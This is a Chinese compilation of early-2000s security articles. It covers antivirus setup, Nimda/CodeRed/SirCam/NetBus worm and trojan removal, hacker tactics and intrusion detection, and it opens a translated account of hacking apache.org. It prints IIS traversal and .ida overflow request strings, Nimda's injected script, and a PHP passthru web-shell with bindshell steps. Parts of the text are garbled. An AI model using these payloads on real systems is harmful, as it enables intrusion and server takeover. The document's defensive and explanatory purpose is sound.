* 经常备份用户数据
* 启用防病毒软件的实时监控功能
小型局域网的防范
(1)简单对等网络的防范
简单对等网络,就是将一些计算机简单地通过集线器(Hub)连接在一起的方式。这类网络的特点是架构简单,没有明确的服务器,大多采用文件共享的方式进行数据交换。
由于这种网络相对封闭,或者某些主机通过拨号接入的方式联接到因特网,病毒只能通过某台主机的软盘、光盘等侵入整个网络。对这类网络的防毒主要还是基于单机病毒防范,同时对每台计算机安装病毒实时监控程序,可以防止病毒通过文件共享等方式在网络内传播。
(2)Windows NT网络的防毒
* 使NT服务器全部为NTFS分区格式。减少DOS病毒感染
* NT服务器常把光盘共享给用户,要严格控制外来光盘的使用
用户的权限和文件的读写属性要加以控制。将公用文件属性设为只读,可极大的限制病毒传播
* 由于登录 NT网络的工作站基本上为有盘工作站,在工作站上安装具有实时查、杀功能的杀毒软*
件,能阻止病毒从工作站进入网络系统
* 在服务器端安装基于NT服务器的32位的实时检查、实时杀毒的服务器杀毒软件,可消除病毒在网上的传播
* 利用登录 NT网络后执行脚本的功能,实现工作站防病毒软件的升级和更新
* 尽量不要直接在NT服务器上运行如各类应用程序,包括Office之类的办公自动化软件
* 安装NT的服务器必须物理上绝对安全,不能有任何非法用户能够接触到该服务器,并且设置成只从硬盘启动。因为目前有些工具可以在DOS下直接读写NTFS分区
大型网络的防范
企业网络的病毒防护,除了要对各个内网严加防范,更重要的是要建立多层次的网络防范架构,并同网管结合起来。主要的防范点有:因特网接入口、外网上的服务器、各内网的中心服务器等。
& 可以采用的主要手段有:
* 在因特网接入口处安装防火墙式防杀病毒产品。
在外网专设一台服务器,安装服务器版网络防杀病毒软件,对整个网络进行实时监控。
* 如果外网的服务器是基于 NT的,那么这些服务器上也要安装相应的防病毒软件,比如邮件服务器
使用微软Exchange Server,就需要在上面安装专为微软Exchange
Server设计的防病毒软件。
外网上的工作站,需要进行单机布防,适当参考小型局域网防范要点进行有选择地增加。
* 在每个内网参照小型局域网的防范要点布防。
内网中的工作站参考单机、和小型局域网的防范要点进行布防。
建立严格的规章制度和操作规范,定期检查各防范点的工作状态。
如何预防网络病毒
随着网络与INTERNET的广泛应用与发展,病毒通过网络和电子邮件等途径传播扩散,传播速度更快、影响面更广、危害性更强。因此,要保障计算机网络系统的安全,就要加强对网络计算机病毒的检测与清除,通过安装反病毒软件,制定有针对性的网络防毒策略,阻止病毒在企业内部网上传播,减少计算机病毒对网络造成的威胁。
事实上,并不是所有的病毒都能通过互联网传播,例如单纯的引导型病毒就很少能在互联网上传播。互联网上的病毒几乎都是常规单机病毒,真正能够称得上网络型的病毒绝少。也就是说,互联网上的病毒的机制不过就是单机型的,只不过是通过网络传播罢了,因此使用目前流行的杀病毒软件就能将这些病毒清除。这也说明,病毒的传播和感染也由以软盘、软件为媒介发展到了互联网时代的以网络(电子邮件等)为媒介的侵入。
比如最近的求职信变种(Win32.Klez.k/l)病毒:警惕程度为最高级,被列为近期危害最为严重的病毒。与原病毒求职信相比,这次的新变种在原病毒的基础上增加了更多的工作线程,具有更强的隐蔽性和破坏性。它可以自动改换不同的邮件主题和内容,瓦解邮件接收者的警惕性。通过用户地址簿以邮件形式,非法将用户的重要文件大范围泄密出去。当病毒驻留系统后,会强行终止用户正在进行的其它正常操作,感染和破坏用户的应用程序,甚至终止杀毒软件的进程。大面积传播,会挤占网络带宽资源,会对邮件服务器造成过大的负载
在互联网或内部局域网中,一般在下述情况下会很容易感染病毒。
进行网页浏览时,如果在某些不太可靠的站点上下载了文件,然后又运行了这些文件;
(2)共享文件夹最容易给病毒以可趁之机,在局域网内尽可能不使用共享文件夹。
(3)进行FTP远程登录到服务器进行下载文件操作,然后又运行了所下载的文件。
(4)收到不明的电子邮件后,不要轻易查看更不能毫无防护的情况下查看“附件”,因为这些附件
中有能插入了含有病毒的可执行文件。
同时,企业要在内部的局域网中建立防病毒管理中心,设立计算机病毒管理员,负责各局域网病毒防护工作,按照各局域网的防病毒要求,制定网络病毒防护和管理策略。病毒的确让人害怕,我们难免会遇到它,只有了解病毒的相关知识,对症下药,才能最终解决问题!
Nimda蠕虫病毒介绍
9月18日,一种更具破坏力的恶意代码――Nimda worm 蠕虫开始在Internet上迅速蔓延传播。Nimda蠕虫病毒感染Windows
系列多种计算机系统,通过多种渠道传播,其传播速度之快、影响范围之广、破坏力之强都超过Code
Red II。
该病毒会通过email传播,当用户邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK
EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经不知不觉中执行了。病毒执行时会将自己复制到临时目录,再运行在临时目录中的副本。病毒还会在windows的system目录中生成load.exe文件,同时修改system.ini中的shell从shell=explorer.exe改为explorer.exe
load.exe -dontrunold,使病毒在下次系统启动时仍然被激活。另外,在system目录下,病毒还会生成一个副本:riched20.dll。为了通过邮件将自己传播出去,病毒使用了MAPI函数读取用户的email并从中读取SMTP地址和email地址。
另外,病毒运行时会利用ShellExcute执行系统中的一些命令如:NET.EXE、USER.EXE、SHARE.EXE等命令,将Guest用户添加到Guests、Administrators组(针对NT/2000/XP),并激活Guest用户。还将C盘根目录共享出来。
、影响系统
Windows95, 98,ME,NT 和2000 所有客户端和服务器系统
、传播方式
* 通过电子邮件从一个客户端感染另一个客户端
* 通过开放的网络共享从一个客户端感染另一个客户端
* 通过浏览被感染的网站从Web 服务器感染客户端
* 通过主动扫描或利用 “Microsoft IIS 4.0 / 5.0 directory
traversal”的缺陷”从客户端感染Web 服务器
* 通过扫描 “Code Red” (IN-2001-09),和 “sadmind/IIS”
(CA-2001-11) 留下的后门从客户端感染Web 服务器
三 、影响
感染Nimda 病毒的机器会不断向Windows
的地址薄中的所有的邮件发送携带了Nimda病毒的邮件的拷贝。
同样的,客户端机器会扫描有漏洞的IIS 服务器。Nimda
会搜寻以前的IIS蠕虫病毒留下的后门:Code Red II [IN-2001-09] 和
sadmind/IIS worm [CA-2001-11]; 它也试图利用IIS Directory Traversal
漏洞 (VU #111677)。
初步分析表明,
该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通过大量发送电子邮件和扫描网络可以导致网络的“拒绝服务”(DoS)。
四 、分析
被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦在该服务器上运行,蠕虫就会遍历系统里的每一个目录(甚至包括所有通过共享文件可以读取得目录),然后会在磁盘里留下一份自身拷贝,取名为&README.EML&。一旦找到了含有web内容的目录(包含html或asp文件),下面Javascript代码段就会被添加到每一个跟web有关的文件中:
&script
language=&JavaScript&&window.open(&readme.eml&, null,
&resizable=no,top=6000,left=6000&)
&/script&
这段代码使得蠕虫可以进一步繁衍,通过浏览器或浏览网络文件感染到新的客户端。
通过浏览器传播
作为感染过程的一部分,Nimda 更改所有的含有web内容的文件(象
.htm, ,html, .asp
等文件)。这样,任何用户浏览该文件,不管是通过浏览器还是网络,就可能会下载一份该病毒。有些浏览器会自动的执行下载动作,感染正在浏览该网站的机器。
通过文件系统感染
Nimda病毒生成大量的自身的复本,取名为README.EML,
写到该用户有可写权限的目录里。如果在另一台机器的用户通过网络共享选取病毒文件,并且设置了预览功能的话,蠕虫就会威胁到这台新的机器。
系统记录
对任何开放80/tcp端口的web服务器,Nimda蠕虫的扫描会生成下面的日志:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\
x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
注:这个例子的前四行表明在试图连接Red Code II
留下的后门,例子的其余部分在试图利用Directory Traversal
五 、解决方案
各单位必须高度重视抵抗本次病毒工作,迅速组织管理人员,
密切监视网络运行状态,一旦发现此类蠕虫,迅速采取处理措施。
修复尼姆达(W32.Nimda.A@mm)病毒感染的方法
&尼姆达(W32.Nimda.A@mm)&专杀工具
ftp://ftp.seu.edu.cn/Pub/AntiVirus/Duba_Concept.EXE
&尼姆达(W32.Nimda.A@mm)&病毒手工修复方法:
请用户按照如下方法一步一步进行手动清除:
1、打开进程管理器,查看进程列表;
2、结束其中进程名称为“xxx.tmp.exe”以及“Load.exe”的进程(其中xxx为任意文件名);
3、切换到系统的TEMP目录,寻找文件长度为57344的文件,删掉它们;
4、切换到系统的System目录,寻找名称为Riched20.DLL的文件;
5、查看Riched20.DLL的文件大小,系统的正常文件大小应该在100K以上,而Concept
病毒的副本大小为57344字节,如果有长度为57344字节的Riched20.DLL,删掉它;
6、继续在系统的System目录下寻找名称为load.exe、长度为57344字节的文件,删掉它;
7、在C:\、D:\、E:\三个逻辑盘的根目录下寻找Admin.DLL文件,如果在根目录下存在该文件,则删除它;
8、打开System.ini文件,在[load]中如果有一行“shell=explorer.exe
load.exe -dontrunold”,则改为“shell=explorer.exe”;
9、如果是WinNT或者Win2000以及WinXP系统,则打开“控制面板|用户和密码”,将Administrator组中的guest帐号删除;
10、打开共享文件夹管理,将共享“C$”去除,该共享为本地C:\的完全共享;
11、搜索整个机器,查找文件名为Readme.eml的文件,如果文件内容中包含
“&HTML&&HEAD&&/HEAD&&BODY bgColor=3D#ffffff&
&iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0&
&/iframe&&/BODY&&/HTML& ”
“Content-Type: audio/x-
name=&readme.exe&
Content-Transfer-Encoding: base64”,则删掉该文件。
只要用户您认真仔细地依照上述方法步骤,便可做到手动清除新“概念”蠕虫,赶快行动吧!
Unicode 漏洞补丁:
ftp://ftp.seu.edu.cn/incoming/Document/IIS_UNICODE_patch/
&&&&&&&&&&&&&&&&&&&&&&&
Nimda病毒变种
10月30日,某病毒公司表示,他们发现了五种“尼姆达(Nimda)”病毒的新变种。于此同时,我们在校园网内也发现了这些变种的Nimda病毒,并由德鲁比同志以身试毒,证实该病毒在本机上的感染效率极高,可在几小时内导致系统瘫痪。由于变种病毒修改不大,所以传播速度并不是很快,造成的影响也远不及9月Nimda爆发时大。
最新的新变种被称作“Nimda.e”。与原先版本所不同的是,最新变种病毒的附件由原先的“README.EXE”变为“SAMPLE.EXE”。Kaspersky
Labs公司将另外四个变种分别命名为“Nimda.a”、“Nimda.b”、“Nimda.c”、“Nimda.d”。
发现的常见本机病毒文件(Nimda.a,Nimda.e):
1.readme.eml&&&&&&& 454768bytes
2.riched20.dll&&&&& 2244608bytes
&&& 3.*.eml&&&&&&&&&&&&
IIS红色蠕虫病毒CodeRed介绍
红色蠕虫病毒利用微软web服务器IIS
4.0或5.0中index服务的安全缺陷,攻破目的机器,并通过自动扫描感染方式传播蠕虫。由于很多Windows
NT系统和Windows 2000系统都缺省提供Web服务,因此该蠕虫的传播速度极快,大大地加重网络的通信负担,常常造成网络瘫痪。
该病毒发作的典型现象是:
(1) 网络上发现大量字节长度很小的HTTP数据包;
网络性能急剧下降,路由器、交换机等网络设备负载加重,甚至崩溃;
(3) Web Server上的访问日志出现大量类似如下的HTTP请求:
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u
%ucbd3%u%u6858%ucbd3%u%u6858%ucbd3%u%u%u00c3%u000
3%u8b00%u531b%u53ff%u%u00=a HTTP/1.0&
受影响的系统
红色蠕虫病毒影响以下的计算机系统:安装有IIS
4.0或者IIS 5.0的Microsoft Windows NT 4.0、Windows 2000;Cisco Call Manager,
Unity Server, uOne, ICS7750, Building Broadband Service Manager;没有打过补丁的Cisco
600 series DSL路由器。
预防及恢复
最简单的处理方法:关闭IIS4.0或IIS5.0的WEB服务器,这样CodeRed病毒将无法感染你的机器。
一、立即采取以下两种安全防范措施之一,预防红色蠕虫病毒感染。
方法1:下载补丁软件,地址为:
Win2000:ftp://ftp.seu.edu.cn/Pub/System/OS/Win2k/Qk_SP3_x86_cn.exe
方法2:把%windowsdir%(Windows安装目录)\system32中的idq.dll做备份,然后删除。
二、检察系统是否已被感染红色蠕虫病毒。如果在系统文件中发现有下列后门(木马)程序:C:\explorer.exe,D:\explorer.exe,则说明系统已经被病毒感染。
三、对于已经感染病毒的主机,按以下步骤手工消除病毒:
将该机器从网络上断开,以避免重复感染和感染其它机器。
(2) 立即停止IIS服务。打开控制面板,打开&服务&,点击World
Wide Web Publishing Service. 选择&已禁用&。
(3) 打开任务管理器,选择&进程&。检查是否进程中有两个&exploer.exe&.如果您找到
两个&exploer.exe&,说明木马已经在您的机器上运行了,您应当立刻杀掉木马程
序;否则,说明您还没有执行木马程序,您可以转到第四步。
(4) 在菜单中选择 查看| 选定列 |
线程计数,按确定。这时您会发现显示框中增加了新的一列&线程数&。检查两个&exploer.exe&,
显示只有一个线程的&exploer.exe &就是木马程序。您应当立刻结束这个进程。
(5) 重新启动机器,运行cmd,在cmd窗口中运行以下命令以删除蠕虫病毒留下的后门。
C:
CD C:\
ATTRIB -h -s -r explorer.exe
Del explorer.exe
Del C:\inetpub\scripts\root.exe
Del C:\progra~1\Common~1\System\MSADC\Root.exe
D:
CD D:\
Attrib -h -s -r explorer.exe
Del explorer.exe
Del D:\inetpub\scripts\root.exe
Del D:\progra~1\Common~1\System\MSADC\Root.exe
忽略其中任何错误。
(6) 修改被蠕虫改动过的注册表:
运行regedit
选择:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\W3SVC\Parameters\Virtual Roots
选择/C,选择删除;选择/D, 选择删除。
选择:/MSADC,将217换为201。
选择:/scripts,将271换为201。
对于Windows 2000系统,需要打开:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon
将SFCDisable改为0。
(7) 重新启动机器(使修改生效)。
CodeRed专杀工具
ftp://ftp.seu.edu.cn/Pub/AntiVirus/codered/killrc2/
ftp://ftp.seu.edu.cn/Pub/AntiVirus/codered/CodeRedCleanup.exe
CodeRed检测工具
ftp://ftp.seu.edu.cn/Pub/AntiVirus/codered/redalert/
Microsoft补丁
ftp://ftp.seu.edu.cn/Pub/AntiVirus/codered/Microsoft_CodeRed_Worm_Patch/&
&&&&&&&&&&&&&&&&&&&&&&&
CodeRedII简述
病毒特征:
这是一个蠕虫木马双特型病毒。实际上和第一个CodeRed蠕虫病毒相比,这并不是一个简单的变种,与CodeRed相比,这个新蠕虫是极度危险的,因为它不是简单的修改主页,而是通过同样的IIS漏洞实现对一个木马文件的上载和运行。但它们使用的攻击方式是基本一样的,所以这样我们也可以用修补预防CodeRed的方式来预防CodeRedII。但是“CodeRedII”
和CodeRedI来比较,我们可以感觉到这是对中国黑客编写RED CODE的一个报复性产品,而且杀伤力大的多。
病毒检测与发作机理分析:
第一次感染:
首先这个蠕虫会给自己建立一个环境,之后取得本地IP,用来分析子网掩码(将用来传播),并且确认当前系统没有被重复感染。之后判断当前操作系统的语言,是繁体中文还是简体中文。之后判断是否已经被CodeRed感染,如果是的话,这个进程将转入永远休眠。之后CodeRedII根据操作系统来增加线程,非中文系统为300条。如果是中文系统那么将打开600条线程。此时它把大量的繁殖线程转入后台,大规模的复制自己。(这些线程被用于向其他IP地址发送GET
.IDA漏洞请求)之后这个它将在系统中安装一个特洛伊木马。CodeRedII的潜伏期,如果是非中文操作系统他会潜伏1天,对于中文系统它会潜伏2天。
用来进一步传播这个蠕虫,就是它会设置一个本地 IP_STORAGE
变量用来储存本地IP,这个变量用于确定机器不会被重复感染。之后获取系统时间,如果当前时间在2002年后,或者月份在10月以后,那么这个蠕虫将重起计算机,这样就将转播可能限制在3个月内。之后蠕虫开始按一定规律生成目标主机IP地址并试图连接一个远程主机,如果能建立连接那么立刻去试图感染对方主机。
特洛伊程序
该蠕虫会有计划地把cmd.exe 以root.exe的名字复制到msadc 和scripts
目录下,更名为root.exe,成为了一个可怕的后门。(cmd.exe是黑客攻击NT时梦寐以求的东西,好比UNIX
SHELL)。并且将蠕虫中包含的一段2进制代码拆离成件名为explore.exe的木马到本地的驱动器(c:\和d:\)。
这个后门,可能会通过修改注册表,把你的c:\,d:\变成iis的虚拟目录。以上两点都是非常可怕的后门。
SirCam蠕虫病毒介绍
W32.Sircam.Worm@mm蠕虫病毒迅速开始在全球范围内肆虐,它通过电子邮件传播,危害很大。
病毒名称:W32.Sircam.Worm@mm
危险等级:4级(5级最高)
病毒类别:蠕虫
表现:邮件正文是如下的一段英文或西班牙文,中间内容有可能出入,但首尾两句不变。
英文:Hi!
How are you?
send you this file just to have your advice(中间一句有可能不是这样的)
you later. Thanks
西班牙文:
como estas ?
(中间内容有可能是多种情况,首尾不变)
line: Nos vemos pronto, gracias.
危害:
1、群发邮件,选择随机文档附加在你的机器的通讯簿的随机地址进行发送
2、删除硬盘文件,特别注意:删除的条件是你的机器使用“日/月/年”的日期格式
3、每一次启动都在你的硬盘上写数据,直到塞满硬盘
4、泄漏机密:随机将你硬盘上的文件附加进邮件发送
删除步骤:
1、清空回收站,因为Sircam.sys文件将隐藏在回收站中
2、在DOS模式下打开Autoexec.bat文件,如果有如下字段则删除&@win
ecycledsirc32.exe&
3、更改注册表
3.1将regedit.exe改名为regedit.com因为此种病毒在每运行一次exe文件的同时都会发作一次。
3.2进入dos模式,键入©
regedit.exe regedit.com&。
3.3回到windows模式,进入注册表编辑器,查找主键:
HKEY_CLASSES_ROOT/exefile/shell/open/command
删除其原有键值,并将其键值改为&%1&
3.4查找主键HKEY_LOCAL_MACHINE/Software/SirCam并将其删除
3.5查找主键HKEY_LOCAL_MACHINE/Software/Microsoft/Windows
Current Version/Run Services
在其右侧的面板中,如果有Driver32.则坚决删除
&&&&& 特洛伊木马--NetBus介绍与防范
NetBus是一个新近在网络上出现的、和著名网络攻击程序Back
Orifice类似的网络特洛伊木马程序。它会在被驻留的系统中开一个“后门”,使所有连接到Internet上的人都能神不知鬼不觉地访问到被驻留机器(如果他有NetBus控制端的话)--然后控制者可以恶作剧地随意控制你的鼠标,在你机器上播放声音文件,或者打开你的光驱等,更危险的当然是删除你的文件,让你的机器彻底崩溃--如果他想那样做的话。
NetBus比Back
Orifice更方便使用也更强大(当然也更危险)--至少它也同样能控制NT(Back
Orifice不能),这恐怕是以为NT非常安全的人的恶梦了!NetBus的最初版本发布于1998年3月,近来使用较多的是NetBus
1.60和NetBus 1.70。
NetBus的攻击原理
NetBus由两部分组成:客户端程序(netbus.exe)和服务器端程序(通常文件名为:patch.exe)。要想“控制”远程机器,必须先将服务器端程序安装到远程机器上--这一般是通过远程机器的主人无意中运行了带有NetBus的所谓特洛伊木马程序后完成的。这是特洛伊木马程序的由来,也是此类程序发挥作用的关键!因此,不要贸然运行网上下来的程序!这永远是金玉良言!
特别是NetBus
1.70,它在以前的版本上增加了许多“新功能”,从而使它更具危险性!比如:
NetBus 1.60只能使用固定的服务器端TCP/UDP端口:12345,而在1.70版本中则允许任意改变端口号,从而减少了被发现的可能性;重定向功能(Redirection)更使攻击者可以通过被控制机控制其网络中的第三台机器,从而伪装成内部客户机。这样,即使路由器拒绝外部地址,只允许内部地址相互通信,攻击者也依然可以占领其中一台客户机并对网中其它机器进行控制。
发现并清除NetBus的方法
不过,NetBus尽管厉害,发现并去除它却并不困难。
通常,NetBus服务器端程序是放在Windows的系统目录中的,它会在Windows启动时自动启动。该程序的文件名是patch.exe,如果该程序通过一个名为whackamole.exe的游戏安装潜伏的话,文件名应为explore.exe(注意:不是explorer.exe!)或者简单地叫game.exe。
同时,你可以检查Windows系统注册表,NetBus会在下面路径中加入其自身的启动项:
&\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run&
NetBus通过该注册项实现Windows启动时的自动启动。但如果你按Ctrl+Alt+Del,在任务列表中是看不到它的存在的。
正确的去除方法如下:
1、运行regedit.exe;
2、找到&\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run&;
3、将patch项删除(或者explore项);
4、重新启动机器后删除Windows系统目录下的patch.exe(或者explore.exe)即可。
有些木马程序在种木马的同时,感染系统文件,所以即使用以上方法去处了木马,系统文件被运行后,会重新种植木马。即使是防病毒软件,也不一定能彻底清除。
何为黑客:
HACKER(黑客)一词来自于英语HACK(砍),它的普遍含义是电脑系统的非法入侵者。
黑客计策:
1、捕获法。这是常用的手法,即是利用ISP服务器的即时消息功能特性。
2、查卡法。这种程序是“捕获”程序的一部分,主要是捕获信用卡的密码。其他的查卡程序按照特定的程序生成伙造的密码。这种密码可以通过ISP报务器的第一道防线,主黑客开设帐户。
3、即时消息轰炸法。利用即时消息功能,用多种程序,以极快的速度用无数的消息去轰炸特定的用户,PINTING是黑客们常用的手法,使受袭者无法复制快速掠过的文本,也就无法把它转送ISP服务器管理机构。
4、电子邮件轰炸。用数百条消息填堵一个电子信箱是一种确实可靠的在线袭击方法。
5、违反业务条款。它相当于在网上陷害某人,也就是违反ISP服务器成员法规的业务条额。
6、特洛伊木马计。表面上在执行一种程序,实际上是执行另一种程序。
防范方法:
(一)企业防范措施:
1、用高科技方法。常用的方法有两种,一是公开密钥密码与数字签名相结合,另一种是采用防火墙技术。
2、将电子邮件资料和网址划分等级。
3、注意对对操作系统的参数进行设置,因为参数设为默认值往往会成为黑客入侵的突破口。
(二)个人防范措施:
1、时常要注意帐户和密码是否安全。
2、发现问题后要及时更改密码,并要经常更换。
3、对匿名邮件要采用在信箱上安装过滤器,滤去它。
防范黑客的&正规&手段
--动态的入侵检测技术IDS
摘要:黑客是网上不安全的主要因素之一,已经为我们造成了巨大损失。企业用户如何才能有效地防范网络黑客?本文介绍了动态的&入侵检测技术IDS&。
入侵检测技术是当今一种非常重要的动态安全技术,如果与&传统&的静态防火墙技术共同使用,将可以大大提高系统的安全防护水平。
1、入侵检测的内容。关于入侵检测的&定义&已有数种,其中ICSA入侵检测系统论坛的定义即:通过从计算机网络或计算机系统中的若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策略的行为和遭到袭击的迹象(的一种安全技术)。入侵检测技术是动态安全技术的最核心技术之一。传统的操作系统加固技术和防火墙隔离技术等都是静态安全防御技术,对网络环境下日新月异的攻击手段缺乏主动的反应。目前,利用最新的可适应网络安全技术和P2DR(Policy
Protection Detection Response)安全模型,已经可以深入地研究入侵事件、入侵手段本身及被入侵目标的漏洞等。入侵检测技术通过对入侵行为的过程与特征的研究,使安全系统对入侵事件和入侵过程能做出实时响应,从理论的分析方式上可分为两种相异的分析技术:(1)异常发现技术。(2)模式发现技术。
目前,国际顶尖的入侵检测系统IDS主要以模式发现技术为主,并结合异常发现技术。IDS一般从实现方式上分为两种:基于主机的IDS和基于网络的IDS。一个完备的入侵检测系统IDS一定是基于主机和基于网络两种方式兼备的分布式系统。另外,能够识别的入侵手段的数量多少,最新入侵手段的更新是否及时也是评价入侵检测系统的关键指标。
从具体工作方式上看,绝大多数入侵检测系统都采取两种不同的方式来进行入侵检测:基于网络和基于主机的。不管使用哪一种工作方式,都用不同的方式使用了上述两种分析技术,都需要查找攻击签名(Attack
Signature)。所谓攻击签名,就是用一种特定的方式来表示已知的攻击方式。
2.基于网络的IDS。基于网络的IDS使用原始的网络分组数据包作为进行攻击分析的数据源,一般利用一个网络适配器来实时监视和分析所有通过网络进行传输的通信。一旦检测到攻击,IDS应答模块通过通知、报警以及中断连接等方式来对攻击作出反应。基于网络的入侵检测系统的主要优点有:(1)成本低。(2)攻击者转移证据很困难。(3)实时检测和应答。一旦发生恶意访问或攻击,基于网络的IDS检测可以随时发现它们,因此能够更快地作出反应。从而将入侵活动对系统的破坏减到最低。(4)能够检测未成功的攻击企图。
(5)操作系统独立。基于网络的IDS并不依赖主机的操作系统作为检测资源。而基于主机的系统需要特定的操作系统才能发挥作用。
3.基于主机的IDS。基于主机的IDS一般监视Windows NT上的系统、事件、安全日志以及UNIX环境中的syslog文件。一旦发现这些文件发生任何变化,IDS将比较新的日志记录与攻击签名以发现它们是否匹配。如果匹配的话,检测系统就向管理员发出入侵报警并且发出采取相应的行动。基于主机的IDS的主要优势有:(1)非常适用于加密和交换环境。(2)近实时的检测和应答。(3)不需要额外的硬件。
4.集成化:IDS的发展趋势。基于网络和基于主机相互补充。这两种方式都能发现对方无法检测到的一些入侵行为。从某个重要服务器的键盘发出的攻击并不经过网络,因此就无法通过基于网络的IDS检测到,只能通过使用基于主机的IDS来检测。基于网络的IDS通过检查所有的包首标(header)来进行检测,而基于主机的IDS并不查看包首标。许多基于IP的拒绝服务攻击和碎片攻击,只能通过查看它们通过网络传输时的包首标才能识别。基于网络的IDS可以研究负载的内容,查找特定攻击中使用的命令或语法,这类攻击可以被实时检查包序列的IDS迅速识别。而基于主机的系统无法看到负载,因此也无法识别嵌入式的负载攻击。联合使用基于主机和基于网络这两种方式能够达到更好的检测效果。比如基于主机的IDS使用系统日志作为检测依据,因此它们在确定攻击是否已经取得成功时与基于网络的检测系统相比具有更大的准确性。在这方面,基于主机的IDS对基于网络的IDS是一个很好的补充,人们完全可以使用基于网络的IDS提供早期报警,而使用基于主机的IDS来验证攻击是否取得成功。
在下一代的入侵检测系统中,将把现在的基于网络和基于主机这两种检测技术很好地集成起来,提供集成化的攻击签名、检测、报告和事件关联功能。相信未来的集成化的入侵检测产品不仅功能更加强大,而且部署和使用上也更加灵活方便。
5.选择合适的IDS。
这几年有关入侵检测的产品发展比较快,现在比较流行的入侵检测系统(IDS)也比较多,其中Intruder
Alert and Netprowler、Centrax 2.2和Realsecure 3.2采用了集成化的检测方法。
(1)NetRanger:与路由器结合。Cisco的NetRanger是当前性能最好的IDS之一。NetRanger使用一个引擎/控制模型,它几乎能够检测到当前已知的各种攻击。但它在检测碎片攻击方面的表现还不能让人十分满意,虽然它能检测到网络碎片的存在,但不能确定碎片包含着什么内容。NetRanger最大的特点是它将入侵检测技术集成到Cisco的系列路由器中。缺点是依赖OpenView平台,这在一定程度上影响了它的灵活性。
(2)Dragon:碎片攻击的克星。NSW公司的入侵检测产品Dragon在实现有效检测方面它不仅能够检测到现在已知的几乎所有的攻击,而且是仅有的几种能够检测到碎片攻击的IDS中表现最好的。
(3)RealSecure:集成化IDS的典范。现在采取基于主机、基于网络和这两种检测技术集成起来的三种入侵检测产品中,只有ISS的最新产品RealSecure
3.2目前做到了这两种检测技术的完美集成。这使得RealSecure在各种入侵检测产品中一枝独秀,遥遥领先。的IDS都有各自的优势,两者系统管理员如何防范黑客攻击
我们是如何攻破www.apache.org的
by {} and Hardbeat
译: quack
一、写在前面
这篇文章并不是发现了什么最新的漏洞,它只是指出了一个普通的配置错误--甚至连apache.org的工作人员也会配置错误:),所以这只是一个警告:修补你的系统,才能防止恶意侵袭。
这里描述了我们如何在一周内成功地得到了运行www.apache.org的机器的root权限并且将其主页面上的Powered
by Apache图样(羽毛状的图画)改成了Powered by Microsoft BackOffice的图样,没有做其它的任何改动了--除了帮他们赶跑了另外(可能是恶意)的入侵者。
这里所描述的漏洞甚至不是apache相关的,它们仅仅是配置失误,其中之一是BugZilla的……但它的开发者在README文件中对配置方法做了详尽的描述,所以――一切只能是使用者自己的责任了,apache的用户不必为此而担心的:)。
我们对www.apache.org进行尝试的原因是有太多的服务器上跑的都是阿帕奇了,如果它的主机是不安全的,那么入侵者就可能在它的源代码里放置后门,这会危及许多用户的利益。
当然我们不愿看到这种事发生,所以我们帮apache补上了漏洞――当然在得到了ROOT权限之后我们无法控制自己更改主页的欲望:),开个小玩笑吧。
以下是整个入侵的过程:
1、ftproot == wwwroot
在寻找apache httpserver想要查看新版本是否存在缓冲溢出的过程中――我们连接上
了ftp:/ftp.apache.org――和http://www.apache.org是同一个目录并且有一个可写的目录存在!
于是我们写了一个小脚本wuh.php3包含了下面的语句:&
passthru($cmd);
将它上传到了那个可写的目录中。
2、Our commands executed
所以,很方便的,id这个命令可以被下面的语句调用:
http://www.apache.org/thatdir/wuh.php3?cmd=id
而后再上传一些bindshell的程序并用类似
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c
的语句来编译它,然后执行……
http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
3、The shell
我们使用的bindshell程序是有密码验证的:),相对安全一些。
现在我们可以telnet到端口65533――我们定义的端口绑定处了,这样我们得到了本地nobody权限的进入权――因为cgi是以nobody身份运行的。&
4、The apache.org box
在apache.org的机器里我们发现了:
-o=rx /root&
-o=rx homedirs
apache.org运行的是freebsd3.4的平台,我们不想仅仅通过缓冲区溢出或者乱七八糟的exploit来得到root,让我们来试试仅仅通过他们自己配置的漏洞来得到最高权限吧!
